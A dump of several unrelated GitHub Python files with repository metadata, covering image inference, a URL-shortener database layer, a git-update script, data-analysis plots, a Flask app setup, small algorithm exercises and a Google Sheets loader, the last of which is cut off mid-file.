(x_, y_, name) in enumerate(zip(x, y, image_name)):\n\n if name not in condition.keys():\n condition[name] = np.zeros((max_y, max_x))\n\n sss = time.time()\n overlap = int(patch_size * (1 - overlap_ratio))\n init_y = int(y_) * overlap\n if int(y_) * overlap < 2448 - patch_size:\n end_y = int(y_) * overlap + patch_size\n res_y = patch_size\n else:\n end_y = 2449\n res_y = 2448 - (int(y_) * overlap + patch_size)\n\n init_x = int(x_) * overlap\n if int(x_) * overlap < 3264 - patch_size:\n end_x = int(x_) * overlap + patch_size\n res_x = patch_size\n else:\n end_x = 3265\n res_x = 3264 - (int(x_) * overlap + patch_size)\n\n condition[name][int(y_)][int(x_)] = 1\n eee = time.time()\n patch_making += (eee - sss)\n image[:, init_y: end_y, init_x: end_x] += prediction[idx][:, :res_y, :res_x]\n\n\n if np.sum(condition[name]) == max_x * max_y:\n #to_save_image = to_save_image[:, :2448, :3264].permute(1, 2, 0).cpu().detach().numpy()\n start_sr = time.time()\n image[:, 384:, :] /= 2.\n image[:, :, 384:] /= 2.\n end_sr = time.time()\n sr_only += end_sr - start_sr\n save_name = str(name).replace(\"_input_\", \"_\") + \".png\"\n s = time.time()\n\n prediction_images.append(image.permute(1, 2, 0).byte().detach().cpu().numpy())\n prediction_paths.append(save_name)\n end = time.time()\n print('Inference time per image...', end - start_inf)\n image[:,:,:] = 0.\n e = time.time()\n output_patch += e - s\n\n save_start = time.time()\n sub_prediction_image = np.array_split(prediction_images, 8)\n sub_prediction_path = np.array_split(prediction_paths, 8)\n\n\n process_list = []\n\n for sub_img, sub_path in zip(sub_prediction_image, sub_prediction_path):\n proc = Process(target=save_image, args=(args.save_path, sub_path, sub_img,))\n process_list.append(proc)\n proc.start()\n\n for proc in process_list:\n proc.join()\n print(\"Data Save...\", time.time()-save_start)\n\n os.system('cd '+args.save_path+\" \"+'&& zip -1 ../submission_upl.zip '+\"./*.png\")\n print(\"Inference End\")\n\n ########\n final_end_time = time.time()\n ########\n print(\"Patch Making:\", patch_making)\n print(\"Type conversion:\", output_patch)\n print(\"Save - Reset:\", sr_only, 's')\n print(\"Model Inference Time:\", inference_only, 's')\n print(\"Inference Elapsed Time:\",final_end_time-final_start_time,\"s\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rlawjdghek/2021-LG-AI-Competition","sub_path":"src/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"75406336007","text":"#!/usr/bin/env python\n\nimport pdb, json, cv2, numpy as np\nfrom scipy.misc import imread\nfrom TensorBox.predict import TensorBox\n\n# Read in image (RGB format)\nimg = imread('data/liberia_sample_940.jpg')\n\n# Reconstruct the model, will automatically download weights\nmodel = TensorBox()\n\ndescription = json.load(open('weights/tensorbox/description.json'))\n\n# Infer buildings\nresult = model.predict_image(img)\nresult = result[result.score > description['threshold']]\n\norig = img.copy()\n\n# Plot the boxes on the original image\nfor box in result.values[:, :4].round().astype(int):\n cv2.rectangle(img, tuple(box[:2]), tuple(box[2:4]), (0,0,255))\n\nspace = np.zeros([orig.shape[0], 5, 3])\ncv2.imwrite('with_annotated_buildings.jpg', np.concatenate([orig, space, img], axis=1))","repo_name":"ArnholdInstitute/ColdSpots","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"72833409289","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Module to abstract away the database setup and access code.\"\"\"\n\nimport random\nimport string\nfrom typing import Dict, Optional\n\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\n\n\nclass DynamoTable(object):\n \"\"\"\n Class to simplify interaction with the configured DynamoDB.\n\n It abstracts away the necessary schema definition for a table that\n can hold a long url which is stored under a short key.\n\n \"\"\"\n\n def __init__(\n self,\n table_name: str = \"urls\",\n local: bool = False,\n ):\n \"\"\"\n Initialize a connected DynamoDB table.\n\n Arguments:\n table_name (str): (Optional) Name of the table on the Dynamo\n Database to connect to. If no name is provided `urls` is used\n by default.\n local (bool): Whether to use a local instance of DynamoDB. If True,\n the DynamoDB should be reachable at \"http://localhost:8000\".\n Default is False.\n\n \"\"\"\n self.table_name = table_name\n self.table = None\n\n endpoint_url = None\n if local:\n endpoint_url = \"http://localhost:8000\"\n\n self.dynamodb = boto3.resource(\n \"dynamodb\",\n region_name=\"us-west-1\",\n endpoint_url=endpoint_url,\n )\n\n self.KEY_SCHEMA = [\n {\n \"AttributeName\": \"short\",\n \"KeyType\": \"HASH\",\n },\n ]\n\n self.ATTRIBUTES_DEFINITIONS = [\n {\n \"AttributeName\": \"short\",\n \"AttributeType\": \"S\",\n },\n ]\n\n self.PROVISIONED_TRHOUGHPUT = {\n \"ReadCapacityUnits\": 10,\n \"WriteCapacityUnits\": 1,\n }\n\n if not self.table:\n self.conntect_table()\n\n def conntect_table(self):\n \"\"\"\n Connect to an existing table or create a new table by the name.\n\n Sets the classes `table` attribute to an active table with the given\n name. If no such table exists to connect to, a table is created.\n\n Raises:\n RuntimeError: Raised if existing of created table responds to a\n status check, but with a status different than \"ACTIVE\".\n\n \"\"\"\n table = self.dynamodb.Table(self.table_name)\n try:\n status = table.table_status\n except ClientError:\n table = self.create_table()\n status = table.table_status\n else:\n if status != \"ACTIVE\":\n raise RuntimeError\n self.table = table\n\n def create_table(self):\n \"\"\"\n Create table with the given name and the schema defined in the class.\n\n Returns:\n boto3.resource.Table: The created table object and does not set any\n attributes of the class.\n\n \"\"\"\n return self.dynamodb.create_table(\n TableName=self.table_name,\n KeySchema=self.KEY_SCHEMA,\n AttributeDefinitions=self.ATTRIBUTES_DEFINITIONS,\n ProvisionedThroughput=self.PROVISIONED_TRHOUGHPUT,\n )\n\n def save_long_url(self, long_url: str) -> Dict[str, str]:\n \"\"\"\n Save a given long URL under a randomly generated key in the DB.\n\n Arguments:\n long_url (str): URL which to save.\n\n Returns:\n dict: Contains the `short` key and `long` URL.\n\n Raises:\n RuntimeError: Raised if the DynamoDB table responds with a\n different HTTP status than 200.\n\n \"\"\"\n item = {\n \"long_url\": long_url.strip(),\n }\n # Check if long already in db\n item[\"short\"] = self.get_short_of_long(long_url)\n\n if item[\"short\"] is None:\n put_succsess = False\n while not put_succsess:\n item[\"short\"] = random_string()\n try:\n response = self.table.put_item(\n Item=item,\n ConditionExpression=Attr(\"short\").not_exists(),\n )\n except ClientError as e:\n if \"ConditionalCheckFailedException\" not in e.args[0]:\n raise e\n pass\n else:\n put_succsess = True\n\n if response[\"ResponseMetadata\"][\"HTTPStatusCode\"] != 200:\n raise RuntimeError\n return item\n\n def get_short_of_long(self, long_url: str) -> Optional[str]:\n \"\"\"\n Get short key for given long URL.\n\n Arguments:\n long_url (str): Long URL to lookup in the database and for which\n to return the short key.\n\n Returns:\n str: Short key for the given long URL.\n None: If no short key was found, `None` is returned\n\n \"\"\"\n response = self.table.scan(\n FilterExpression=Attr(\"long_url\").eq(long_url),\n )\n if response[\"Count\"] == 0:\n return None\n return response[\"Items\"][0].get(\"short\")\n\n def get_long_from_short(self, short: str) -> Optional[str]:\n \"\"\"\n Get long URL saved under a given `short` key.\n\n Arguments:\n short (str): Short key under which the long URL is saved.\n\n Returns:\n str: Long URL saved under the given short key.\n None: If no entry for the given short key can be found.\n\n \"\"\"\n response = self.table.query(\n KeyConditionExpression=Key(\"short\").eq(short),\n )\n if response[\"Count\"] == 0:\n return None\n item = response[\"Items\"][0]\n return item.get(\"long_url\")\n\n\ndef random_string(length: int = 4) -> str:\n \"\"\"\n Return a random string of given length.\n\n Arguments:\n length (int): (Optional) Length of the returned string. Default: 4.\n\n Returns:\n str: Random string of a given length. The string is composed of upper\n and lower case letters as well as digits 0-9.\n\n \"\"\"\n return \"\".join(\n random.choices(\n string.ascii_letters + string.digits,\n k=length,\n ),\n )\n","repo_name":"tbrlpld/short","sub_path":"short/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":6201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1921601602","text":"import subprocess\nimport os\nimport argparse\n\ndef get_latest_tag(repo_path):\n try:\n result = subprocess.run([\"git\", \"describe\", \"--tags\"], cwd=repo_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n return result.stdout.strip()\n except Exception as e:\n print(f\"Error getting tag: {str(e)}\")\n return None\n\ndef git_pull(repo_path):\n try:\n result = subprocess.run([\"git\", \"pull\"], cwd=repo_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n all_output = result.stdout + result.stderr\n if \"Already up to date.\" in all_output:\n return \"Already up to date.\"\n elif \"error:\" in all_output:\n error_msg = all_output.split(\"error:\")[1].strip()\n return f\"Error during update: {error_msg}\"\n elif \"fatal:\" in all_output:\n fatal_msg = all_output.split(\"fatal:\")[1].strip()\n return f\"Fatal error during update: {fatal_msg}\"\n elif \"Updating\" in all_output or \"Fast-forward\" in all_output:\n return \"Repository updated successfully.\"\n else:\n return \"Unrecognized status. Manual check recommended.\"\n except Exception as e:\n print(f\"Error during pull: {str(e)}\")\n return None\n\ndef find_git_repos(path):\n for root, dirs, files in os.walk(path):\n if \".git\" in dirs:\n yield root\n\ndef main(path):\n for repo in find_git_repos(path):\n print(f\"\\nChecking repository: {repo}\")\n current_version = get_latest_tag(repo)\n print(f\"Current Version: {current_version if current_version else 'Unknown'}\")\n \n pull_result = git_pull(repo)\n print(f\"Update Status: {pull_result}\")\n \n new_version = get_latest_tag(repo)\n if current_version != new_version:\n print(f\"Updated Version: {new_version if new_version else 'Unknown'}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Update Git repositories in a given path.')\n parser.add_argument('path', help='The path to check for repositories')\n\n args = parser.parse_args()\n \n if not os.path.exists(args.path):\n print(\"Provided path does not exist.\")\n else:\n main(args.path)\n","repo_name":"cristianb84/custom_made","sub_path":"update-stuff.py","file_name":"update-stuff.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70654488648","text":"import os\n\nfrom py4design import py3dmodel\nimport las_utils\n\nif __name__ == '__main__':\n #specify the pt cloud directory\n pt_cloud_dir = \"F:\\\\kianwee_work\\\\princeton\\\\2019_06_to_2019_12\\\\campus_as_a_lab\\\\model3d\\\\las2\"\n bdry_shp_file = \"F:\\\\kianwee_work\\\\princeton\\\\2019_06_to_2019_12\\\\campus_as_a_lab\\\\model3d\\\\shp\\\\las_bdry\\\\las_bdry.shp\"\n \n lasfiles = las_utils.get_lasfiles2(pt_cloud_dir)\n bdry_face_list = []\n \n for laspath in lasfiles:\n mn = las_utils.get_las_file_bdry(laspath)\n lasfilename = os.path.split(laspath)[-1].split('.')[-2]\n face = las_utils.make_bdry_face2d(mn)\n shpatt = shpfile_utils.shp2shpatt(face, {'lasfile':lasfilename})\n shpatt_list.append(shpatt)\n bdry_face_list.append(face)\n \n olist = []\n \n for cnt1,f in enumerate(bdry_face_list):\n bdry_list2 = bdry_face_list[:]\n area1 = py3dmodel.calculate.face_area(f)\n for cnt2,f2 in enumerate(bdry_list2):\n if cnt2 != cnt1:\n common = py3dmodel.construct.boolean_common(f, f2)\n is_null = py3dmodel.fetch.is_compound_null(common)\n if not is_null:\n common = py3dmodel.modify.move([0,0,0], [0,0,20], common)\n f2 = py3dmodel.modify.move([0,0,0], [0,0,10], f2)\n f3 = py3dmodel.fetch.topo_explorer(common, \"face\")\n if f3:\n area2 = py3dmodel.calculate.face_area(f3[0])\n if area2 >= area1:\n file1 = list_dir[cnt1]\n file2 = list_dir[cnt2]\n print(\"********************* Overlap file1\", file1)\n print(\"********************* Overlap file2\", file2)\n olist.append([])\n if file1 not in olist:\n olist[-1].append(list_dir[cnt1])\n if file2 not in olist:\n olist[-1].append(list_dir[cnt2])\n #py3dmodel.utility.visualise([[common], [f], [f2]], [\"RED\", \"GREEN\", \"BLUE\"])\n print(len(olist))\n for x in olist:\n print(x)","repo_name":"chenkianwee/py4design_examples","sub_path":"example_scripts/model_princeton3d/rmv_overlap_lidar.py","file_name":"rmv_overlap_lidar.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20941814191","text":"#!/usr/bin/python3\n# 12-pascal_triangle.py\n\"\"\"Defines a Pascal's Triangle function.\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"Represent Pascal's Triangle of size n.\n Returns a list of lists of integers representing the triangle.\n \"\"\"\n if n <= 0:\n return []\n\n result = [[1]]\n while len(result) != n:\n x = result[-1]\n tmp = [1]\n for i in range(len(x) - 1):\n tmp.append(x[i] + x[i + 1])\n tmp.append(1)\n result.append(tmp)\n return result\n","repo_name":"Buezman/alx-higher_level_programming","sub_path":"0x0B-python-input_output/12-pascal_triangle.py","file_name":"12-pascal_triangle.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37724603042","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom uncertainties import * \nfrom uncertainties import unumpy as u\nprint('')\n\n# Load data\nradii_data = np.loadtxt('rms13.dat',skiprows=2,usecols=[0,1,2,3,4])\n\n\n# Assign variables of each isotopes to lists and convert to arrays\n\nZ = []\nA = []\nN = []\nradii = []\nradii_error = []\n\nfor i in range(len(radii_data)):\n\tZ.append(int(radii_data[i,0]))\n\tN.append(int(radii_data[i,1]))\n\tA.append(int(radii_data[i,2]))\n\tradii.append(radii_data[i,3])\n\tradii_error.append(radii_data[1,4])\n\nZ = np.array(Z)\nA = np.array(A)\nN = np.array(N)\nradii = np.array(radii)\nradii_error = np.array(radii_error)\n\n# Order list in ascending Z\n\nZ_i = np.arange(Z.min(),Z.max()+0.1,1)\n\nZ_1 = []\nN_1 = []\nA_1 = []\nradii_1 = []\nradii_error_1 = []\n\nfor i in range(len(Z_i)):\n\tfor j in range(len(Z)):\n\t\tif Z[j] == Z_i[i]:\n\t\t\tN_1.append(N[j])\n\t\t\tZ_1.append(Z[j])\n\t\t\tA_1.append(A[j])\n\t\t\tradii_1.append(radii[j])\n\t\t\tradii_error_1.append(radii_error[j])\n\n# makes uncertainties uarray of radii and their errors\n\nradii_1 = u.uarray(radii_1,radii_error_1)\n\n# Calcualte rms(N) - rms(N-1) (checking that elements differ by only 1 neutron number)\n\nradiinn1 = []\nNnn1 = []\nZnn1 = []\n\nfor i in np.arange(1,len(Z_1)-1,1):\n\tif Z_1[i] == Z_1[i-1]:\n\t\tif N_1[i] == N_1[i-1] + 1:\n\t\t\tradiinn1.append(radii_1[i]-radii_1[i-1])\n\t\t\tNnn1.append(N_1[i])\n\t\t\tZnn1.append(Z_1[i])\n\nradiinn1 = np.array(radiinn1)\nNnn1 = np.array(Nnn1)\nZnn1 = np.array(Znn1)\n\n# Plot either with errorbars or without\n\n# plt.errorbar(Nnn1,u.nominal_values(radiinn1),yerr=u.std_devs(radiinn1),fmt='bo',markersize=0,label='All')\nplt.plot(Nnn1,u.nominal_values(radiinn1),'bo',label='All')\n\n# Plot mercury data in different colour\nNHg = Nnn1[Znn1==80]\nradiiHg = radiinn1[Znn1==80]\n# plt.errorbar(NHg,u.nominal_values(radiiHg),yerr=u.std_devs(radiiHg),fmt='ro',markersize=0,label='Hg')\nplt.plot(NHg,u.nominal_values(radiiHg),'ro',label='$_{80}$Hg')\n\n# Plot yttrium data in different colour\nNY = Nnn1[Znn1==39]\nradiiY = radiinn1[Znn1==39]\n# plt.errorbar(NBe,u.nominal_values(radiiBe),yerr=u.std_devs(radiiBe),fmt='go',markersize=0,label='Be')\nplt.plot(NY,u.nominal_values(radiiY),'go',label='$_{39}$Y')\n\nplt.xlabel('Neutron number')\nplt.ylabel(r'$\\delta \\sqrt{\\langle r^{2} \\rangle}^{N,N-1}}$ (fm)')\n\n# Plot with limits on y to show shell structure\nplt.ylim(-0.08,0.15)\nplt.savefig('rmsdata_zoom.pdf',bbox_inches='tight')\n\n# plt.savefig('rmsdata.pdf',bbox_inches='tight')\n\nplt.legend()\nplt.show()","repo_name":"tikrneva/Talent2017-Group6","sub_path":"Week 1/Exercises/rms_radii.py","file_name":"rms_radii.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71374689288","text":"from sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport graphviz\nimport pandas as pd\nfrom time import time\nfrom sklearn import preprocessing\n\ndef read_data(file='./data/credit_train.csv'):\n\traw_data = pd.read_csv(file)\n\traw_data = raw_data.drop(columns = ['Loan ID', 'Customer ID'])\n\tif 'Loan Status' in raw_data.columns:\n\t\traw_data = raw_data.drop(columns = ['Loan Status'])\n\tdata = dict()\n\tdict_data = dict(raw_data)\n\tle = preprocessing.LabelEncoder()\n\tfor column in dict_data:\n\t\ttransform_list = [str(x) for x in dict_data[column]]\n\t\tfit_list = transform_list\n\t\tle.fit(fit_list)\n\t\tdata[column] = le.transform(transform_list)\n\tdata = pd.DataFrame(data)\n\n\tfeature_names = list(data.columns)[:-1]\n\ty = [x for x in data['Bankruptcies']]\n\tX = data.drop(columns = ['Bankruptcies'])\n\treturn X, y, feature_names\n\nX, y, feature_names = read_data('./data/credit_train.csv')\nX_test, y_true, _ = read_data('./data/credit_test.csv')\n\nclf = tree.DecisionTreeClassifier()\nstart = time()\nclf = clf.fit(X, y)\nend = time()\n\n\ny_pred = clf.predict(X_test)\n\naccuracy = accuracy_score(y_true, y_pred)\nprint('Prediction: ', y_pred)\nprint('Accuracy: ' + str(accuracy))\n\ntree.plot_tree(clf)\n\ndot_data = tree.export_graphviz(clf, out_file=None,\n\tfeature_names=feature_names,\n\tfilled=True, rounded=True, special_characters=True)\ngraph = graphviz.Source(dot_data)\ngraph.render('./model/' + str(start) + '_accuracy_' + str(accuracy) + '_model')\n\ntrain = pd.DataFrame({**X, \"class\": y})\ntrain.to_csv('./log/' + str(start) + '_accuracy_' + str(accuracy) + '_train.csv', index=True)\n\nresult = pd.DataFrame({**X_test, \"true class\": y_true, \"predicted class\": y_pred})\nresult.to_csv('./log/' + str(start) + '_accuracy_' + str(accuracy) + '_test.csv', index=True)","repo_name":"DXV-HUST-SoICT/data_mining_mini_projects","sub_path":"decision tree/credit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39213426587","text":"# 로또의 최고 순위와 최저 순위 : https://programmers.co.kr/learn/courses/30/lessons/77484\n\ndef solution(lottos, win_nums):\n answer = [0,0]\n \n cnt=0\n zero_cnt=0\n \n for i, num in enumerate(win_nums):\n if num in lottos:\n cnt+=1\n if lottos[i]==0:\n zero_cnt+=1\n \n rank=[6,6,5,4,3,2,1]\n \n answer[0]=rank[zero_cnt+cnt]\n answer[1]=rank[cnt]\n return answer\n","repo_name":"LiveHonestLife/chaewon","sub_path":"Week4/lotto.py","file_name":"lotto.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8771734929","text":"import mongoengine\nimport os\n\nfrom flask import Flask, render_template, request\nfrom flask_login import LoginManager, current_user\nfrom flask_debugtoolbar import DebugToolbarExtension\n\nfrom ica.api.v1 import api\nfrom ica.views.website import website\nfrom ica.views.social import social\nfrom ica.views.management import management\nfrom ica.models.user import User\nfrom ica.cache import cache\nfrom ica.logger import client\nfrom ica.tasks import high_queue\n\n# Server settings\napp = Flask(__name__)\napp.config.from_object(os.getenv('CONFIG'))\n\n# Register apps\napp.register_blueprint(website)\napp.register_blueprint(social, url_prefix='/social')\napp.register_blueprint(management, url_prefix='/management')\napp.register_blueprint(api, url_prefix='/api/v1')\n\n# Database settings\ndb_auth = {\n 'db': app.config['DATABASE_NAME'],\n 'host': app.config['DATABASE_HOST'],\n 'username': app.config['DATABASE_USER'],\n 'password': app.config['DATABASE_PASSWORD']\n}\n\nmongoengine.connect(**db_auth)\n\n# Cache settings\ncache.init_app(app)\n\n# Debug toolbar settings\nDebugToolbarExtension(app)\n\n# Authentication settings\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'website.login'\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.objects(id=user_id).first()\n\n\n# Error handlers\n@app.errorhandler(404)\ndef page_not_found(error):\n header = 'Page Not Found'\n text = 'What you were looking for is just not there. ' + \\\n 'Go somewhere nicer.'\n\n \"\"\"\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '404 ({}) from {} {}'.format(request.url, fname, lname)\n else:\n msg = '404 ({}) from Anonymous'.format(request.url)\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n \"\"\"\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n header = 'Internal Server Error'\n text = 'Looks like something went wrong on our end. We\\'ve ' + \\\n 'been notified and are currently working to fix it!'\n\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '500 from {} {}'.format(fname, lname)\n else:\n msg = '500 from Anonymous'\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 500\n\n\n@app.errorhandler(413)\ndef request_entity_error(error):\n header = 'Request Entity Too Large'\n text = 'You tried to upload a file that was too large! We only' + \\\n ' support uploading photos under 500 KB, so please try again.'\n\n if hasattr(current_user, 'id'):\n fname, lname = current_user.fname, current_user.lname\n msg = '413 from {} {}'.format(fname, lname)\n else:\n msg = '413 from Anonymous'\n\n high_queue.enqueue(\n client.log_event,\n request.headers.get('X-Forwarded-For', request.remote_addr),\n '{} ({})'.format(msg, error)\n )\n\n return render_template('error.html', user=current_user,\n header=header, text=text), 500\n","repo_name":"texas-ica/texas-ica.com","sub_path":"ica/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52094784886","text":"class Solution:\n def search(self, nums: List[int], target: int) -> int:\n \n pivot_index = -1\n \n def search_range(low, high, k_target):\n nonlocal pivot_index\n \n if low > high:\n return\n \n mid = low + (high-low)//2\n if k_target < nums[mid]:\n search_range(mid + 1, high, k_target)\n elif k_target > nums[mid]:\n pivot_index = mid\n search_range(low, mid-1, k_target)\n \n search_range(1, len(nums)-1, nums[0])\n \n def binary_search(low, high):\n \n if low > high:\n return -1\n mid = low + (high - low)//2\n\n if nums[mid]==target:\n return mid\n elif nums[mid] > target:\n return binary_search(low, mid-1)\n else:\n return binary_search(mid + 1, high)\n \n if pivot_index == -1:\n return binary_search(0, len(nums)-1)\n else:\n if nums[0] <= target:\n return binary_search(0, pivot_index -1)\n elif nums[-1] >= target or nums[pivot_index]==target:\n return binary_search(pivot_index, len(nums)-1)\n else:\n return -1","repo_name":"ibsa21/A2SV-practise-questions","sub_path":"33-search-in-rotated-sorted-array/33-search-in-rotated-sorted-array.py","file_name":"33-search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70625512649","text":"import pytest\nfrom context import PyBot, DummyStemmer\n\n\n@pytest.fixture\ndef bot(request):\n bot = PyBot(None)\n\n def cleanup():\n bot = None\n\n request.addfinalizer(cleanup)\n\n return bot\n\n\ndef test_initialize_bot_class(bot):\n # arrange, act\n bot = PyBot(None)\n\n # assert\n assert bot != None\n\n\ndef test_register_action(bot):\n # arrange\n action_name = 'greeting'\n\n def action(name): return \"Hello {}\".format(name)\n\n # act\n bot.register_action(action_name, action)\n actual_action = bot._get_action(action_name)\n\n # assert\n assert actual_action == action\n assert actual_action('World') == 'Hello World'\n\n\ndef test_register_actions(bot: PyBot):\n # arrange\n expected_actions_count = 2\n class_name1 = 'action1'\n\n def action1(): return 'Action 1 Method'\n\n class_name2 = 'action2'\n\n def action2(): return 'Action 2 Method'\n\n # act\n bot.register_actions([\n {'class_name': class_name1, 'method': action1},\n {'class_name': class_name2, 'method': action2}\n ])\n actions_count = len(bot._actions.keys())\n\n # assert\n assert actions_count == expected_actions_count\n assert class_name1 in bot._actions\n assert class_name2 in bot._actions\n\n\ndef test_set_stemmer_on_success_executes_correctly(bot: PyBot):\n\n # arrange\n class DummyStemmer(object):\n def stem(self):\n pass\n\n # act\n bot.set_stemmer(DummyStemmer())\n\n # assert\n assert bot._stemmer != None\n\n\ndef test_set_stemmer_on_exception_should_throw(bot: PyBot):\n # arrange\n\n # act\n with pytest.raises(Exception) as ex:\n bot.set_stemmer(None)\n\n # assert\n assert ex != None\n\n\ndef test_set_stemmer_without_stem_method_throws_exception(bot: PyBot):\n # arrange\n class DummyStemmer:\n pass\n\n # act\n with pytest.raises(Exception) as ex:\n bot.set_stemmer(DummyStemmer())\n\n # assert\n assert ex != None\n\n\ndef test_train(bot: PyBot):\n\n # arrange\n greeting_class = 'greeting'\n train_data = [\n {\n 'class': greeting_class,\n 'sentences': [\n 'hi',\n 'hello',\n 'hey',\n 'whats up',\n 'he hello'\n ]\n }\n ]\n bot.set_stemmer(DummyStemmer())\n\n # act\n bot._train(train_data)\n\n # assert\n assert bot._corpus_words != {}\n assert 'hi' in bot._corpus_words\n assert 'hey' in bot._corpus_words\n assert 'hello' in bot._corpus_words\n assert bot.corpus_words['hello'] == 2\n assert bot._class_words != {}\n assert greeting_class in bot._class_words\n assert len(bot._class_words[greeting_class]) > 0\n","repo_name":"fabianobizarro/pybot","sub_path":"tests/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21079889292","text":"import sys\nn, m = map(int, input().split())\nres = []\narray = []\nfor i in range(n):\n array.append(list(sys.stdin.readline().rstrip()))\n\nfor i in range(n-7):\n for j in range(m-7):\n w = 0\n b = 0\n for e in range(i, i + 8):\n for q in range(j, j + 8):\n if (e + q) % 2 == 0:\n if array[e][q] != 'W': w += 1\n if array[e][q] != 'B': b += 1\n else:\n if array[e][q] != 'B' : w += 1\n if array[e][q] != 'W' : b += 1\n \n res.append(w)\n res.append(b)\nprint(min(res))","repo_name":"wonjune2/algorithm","sub_path":"backjoon/브루트 포스/1018.py","file_name":"1018.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12539392154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom pathlib import Path\nfrom typing import Dict, List, NamedTuple, Optional, Union, Any\n\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nfrom ..databases.constants import (\n CompositeVariableField,\n InstitutionField,\n SiglaAnswerField,\n VariableField,\n VariableType,\n)\nfrom ..utils.exceptions import ErrorInfo\nfrom . import exceptions\nfrom .constants import GoogleSheetsFormat as gs_format\nfrom .constants import GoogleSheetsInfoField, MetaDataField\nfrom .utils import (\n FormattedSheetData,\n SheetData,\n create_institution_sub_category,\n)\n\n###############################################################################\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(levelname)4s: %(module)s:%(lineno)4s %(asctime)s] %(message)s\",\n)\nlog = logging.getLogger(__name__)\n\nGOOGLE_API_SCOPES = [\"https://www.googleapis.com/auth/spreadsheets\"]\n\n###############################################################################\n\n\ndef _get_composite_variable(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[int, List[Dict[str, str]]]]]:\n \"\"\"\n Get the composite variable from a SheetData.\n\n Parameters\n ----------\n sheet_data: SheetData\n The sheet data containing the composite variable.\n\n Returns\n -------\n composite_variable: List[Dict[str, Union[int, List[Dict[str, str]]]]]\n A list of individual variables of a composite varible.\n \"\"\"\n column_names = sheet_data.data[0]\n composite_variable = [\n {\n CompositeVariableField.index: i,\n CompositeVariableField.sigla_answers: [\n {SiglaAnswerField.name: column_name, SiglaAnswerField.answer: row[j]}\n for j, column_name in enumerate(column_names)\n ],\n }\n for i, row in enumerate(sheet_data.data[1:])\n ]\n\n log.info(\n f\"Found composite variable: {sheet_data.meta_data.get('variable_heading')} of length {len(composite_variable)} \"\n f\"from sheet: {sheet_data.sheet_title}\"\n )\n return composite_variable\n\n\ndef _get_multilple_sigla_answer_variable(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]:\n \"\"\"\n Get the list of institutions and their variables from a sheet.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of a sheet.\n\n Returns\n -------\n institutions: List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]\n The list of institutions and their variables\n \"\"\"\n try:\n institution = {\n InstitutionField.spreadsheet_id: sheet_data.spreadsheet_id,\n InstitutionField.sheet_id: sheet_data.sheet_id,\n InstitutionField.name: sheet_data.meta_data.get(InstitutionField.name),\n InstitutionField.country: sheet_data.meta_data.get(\n InstitutionField.country\n ),\n InstitutionField.category: sheet_data.meta_data.get(\n InstitutionField.category\n ),\n InstitutionField.sub_category: 